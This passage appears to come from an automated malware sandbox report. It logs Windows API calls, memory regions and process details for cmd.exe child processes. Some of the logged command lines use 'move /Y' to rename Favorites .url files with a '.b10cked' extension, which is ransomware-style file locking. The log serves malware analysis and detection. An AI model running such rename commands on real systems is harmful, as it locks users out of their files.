(_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.472] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.472] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0215.473] _wcsicmp (_String1="MSNSPO~1.URL", _String2=".") returned 63 [0215.473] _wcsicmp (_String1="MSNSPO~1.URL", _String2="..") returned 63 [0215.473] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnspo~1.url")) returned 0x20 [0215.473] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x441e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.473] SetErrorMode (uMode=0x0) returned 0x0 [0215.473] SetErrorMode (uMode=0x1) returned 0x0 [0215.473] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL", nBufferLength=0x104, lpBuffer=0x2eee74, lpFilePart=0x2eee5c | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL", lpFilePart=0x2eee5c*="MSNSPO~1.URL") returned 0x2f [0215.473] SetErrorMode (uMode=0x0) returned 0x1 [0215.473] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x12 [0215.473] _wcsicmp (_String1="MSNSPO~1.URL", _String2=".") returned 63 [0215.473] _wcsicmp (_String1="MSNSPO~1.URL", _String2="..") returned 63 [0215.473] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnspo~1.url")) returned 0x20 [0215.473] SetErrorMode (uMode=0x0) returned 0x0 [0215.473] SetErrorMode (uMode=0x1) returned 0x0 [0215.473] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL", nBufferLength=0x104, lpBuffer=0x2ef2f0, lpFilePart=0x2ef088 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL", lpFilePart=0x2ef088*="MSNSPO~1.URL") returned 0x2f [0215.473] SetErrorMode (uMode=0x0) returned 0x1 [0215.473] SetErrorMode (uMode=0x0) returned 0x0 [0215.473] SetErrorMode (uMode=0x1) returned 0x0 [0215.474] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked", nBufferLength=0x104, lpBuffer=0x2ef4f8, lpFilePart=0x2ef088 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked", lpFilePart=0x2ef088*="MSN Sports.url.b10cked") returned 0x39 [0215.474] SetErrorMode (uMode=0x0) returned 0x1 [0215.474] SetLastError (dwErrCode=0x0) [0215.474] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn sports.url.b10cked")) returned 0xffffffff [0215.474] GetLastError () returned 0x2 [0215.474] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL", fInfoLevelId=0x1, lpFindFileData=0x2eea04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eea04) returned 0x430eb0 [0215.474] FindNextFileW (in: hFindFile=0x430eb0, lpFindFileData=0x2eea04 | out: lpFindFileData=0x2eea04) returned 0 [0215.474] GetLastError () returned 0x12 [0215.474] FindClose (in: hFindFile=0x430eb0 | out: hFindFile=0x430eb0) returned 1 [0215.475] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL", fInfoLevelId=0x1, lpFindFileData=0x441c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x441c08) returned 0x430eb0 [0215.475] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked", nBufferLength=0x104, lpBuffer=0x2eec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked", lpFilePart=0x0) returned 0x39 [0215.475] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url", nBufferLength=0x104, lpBuffer=0x2eec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url", lpFilePart=0x0) returned 0x31 [0215.475] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn sports.url")) returned 0x20 [0215.475] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn sports.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn sports.url.b10cked"), dwFlags=0x3) returned 1 [0215.476] FindClose (in: hFindFile=0x430eb0 | out: hFindFile=0x430eb0) returned 1 [0215.476] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eec50 | out: _Buffer=" 1") returned 9 [0215.476] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.476] GetFileType (hFile=0x7) returned 0x2 [0215.597] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.597] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eebdc | out: lpMode=0x2eebdc) returned 1 [0215.597] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.597] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eec10 | out: lpConsoleScreenBufferInfo=0x2eec10) returned 1 [0215.597] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0215.597] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eec50 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0215.597] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eec34, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eec34*=0x1a) returned 1 [0215.597] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.597] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.598] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.598] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.598] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.598] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.598] SetConsoleInputExeNameW () returned 0x1 [0215.598] GetConsoleOutputCP () returned 0x1b5 [0215.598] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.598] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.598] exit (_Code=0) Process: id = "540" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0xd40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31814 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31815 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31816 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31817 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31818 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31819 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31820 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31821 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31822 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 31823 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31950 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31951 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31952 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31953 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 31954 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 31955 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31956 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31957 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31958 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31959 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31960 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31961 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31962 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31963 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31964 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 31965 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31966 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31967 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31968 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31969 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31970 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31971 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 31972 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 31973 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 741 os_tid = 0xad4 [0215.547] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efd94 | out: lpSystemTimeAsFileTime=0x1efd94*(dwLowDateTime=0xb546d5a0, dwHighDateTime=0x1d440a9)) [0215.547] GetCurrentProcessId () returned 0xd40 [0215.547] GetCurrentThreadId () returned 0xad4 [0215.547] GetTickCount () returned 0x3c541 [0215.547] QueryPerformanceCounter (in: lpPerformanceCount=0x1efd8c | out: lpPerformanceCount=0x1efd8c*=27233640765) returned 1 [0215.548] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.548] __set_app_type (_Type=0x1) [0215.548] __p__fmode () returned 0x76b331f4 [0215.548] __p__commode () returned 0x76b331fc [0215.548] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.548] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.548] GetCurrentThreadId () returned 0xad4 [0215.548] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xad4) returned 0x38 [0215.548] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.548] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.548] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.548] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.549] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efd24 | out: phkResult=0x1efd24*=0x0) returned 0x2 [0215.549] VirtualQuery (in: lpAddress=0x1efd5b, lpBuffer=0x1efcf4, dwLength=0x1c | out: lpBuffer=0x1efcf4*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.549] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efcf4, dwLength=0x1c | out: lpBuffer=0x1efcf4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.549] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efcf4, dwLength=0x1c | out: lpBuffer=0x1efcf4*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.549] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efcf4, dwLength=0x1c | out: lpBuffer=0x1efcf4*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.549] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efcf4, dwLength=0x1c | out: lpBuffer=0x1efcf4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.549] GetConsoleOutputCP () returned 0x1b5 [0215.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.549] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.549] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.549] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.549] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.549] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.550] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.550] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.550] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.550] GetEnvironmentStringsW () returned 0x3b0198* [0215.550] FreeEnvironmentStringsW (penv=0x3b0198) returned 1 [0215.550] GetEnvironmentStringsW () returned 0x3b0198* [0215.550] FreeEnvironmentStringsW (penv=0x3b0198) returned 1 [0215.550] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec94 | out: phkResult=0x1eec94*=0x40) returned 0x0 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x0, lpData=0x1eeca0*=0xc0, lpcbData=0x1eec98*=0x1000) returned 0x2 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x1, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x0, lpData=0x1eeca0*=0x1, lpcbData=0x1eec98*=0x1000) returned 0x2 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x0, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x40, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x40, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x0, lpData=0x1eeca0*=0x40, lpcbData=0x1eec98*=0x1000) returned 0x2 [0215.551] RegCloseKey (hKey=0x40) returned 0x0 [0215.551] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec94 | out: phkResult=0x1eec94*=0x40) returned 0x0 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x0, lpData=0x1eeca0*=0x40, lpcbData=0x1eec98*=0x1000) returned 0x2 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x1, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x0, lpData=0x1eeca0*=0x1, lpcbData=0x1eec98*=0x1000) returned 0x2 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x0, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x9, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x9, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x0, lpData=0x1eeca0*=0x9, lpcbData=0x1eec98*=0x1000) returned 0x2 [0215.551] RegCloseKey (hKey=0x40) returned 0x0 [0215.551] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.551] srand (_Seed=0x5b8863b1) [0215.551] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked\"" [0215.551] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked\"" [0215.551] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.551] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.551] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.552] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.552] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.552] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.552] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.552] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.552] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.552] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.552] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.552] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.552] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.552] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.552] GetEnvironmentStringsW () returned 0x3b22e8* [0215.552] FreeEnvironmentStringsW (penv=0x3b22e8) returned 1 [0215.552] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.552] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.552] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.552] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.552] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.552] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.552] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.552] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.552] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.552] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.552] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efa60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.552] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efa60, lpFilePart=0x1efa5c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efa5c*="Desktop") returned 0x18 [0215.552] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.552] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef7dc | out: lpFindFileData=0x1ef7dc) returned 0x3b0028 [0215.553] FindClose (in: hFindFile=0x3b0028 | out: hFindFile=0x3b0028) returned 1 [0215.553] FindFirstFileW (in: 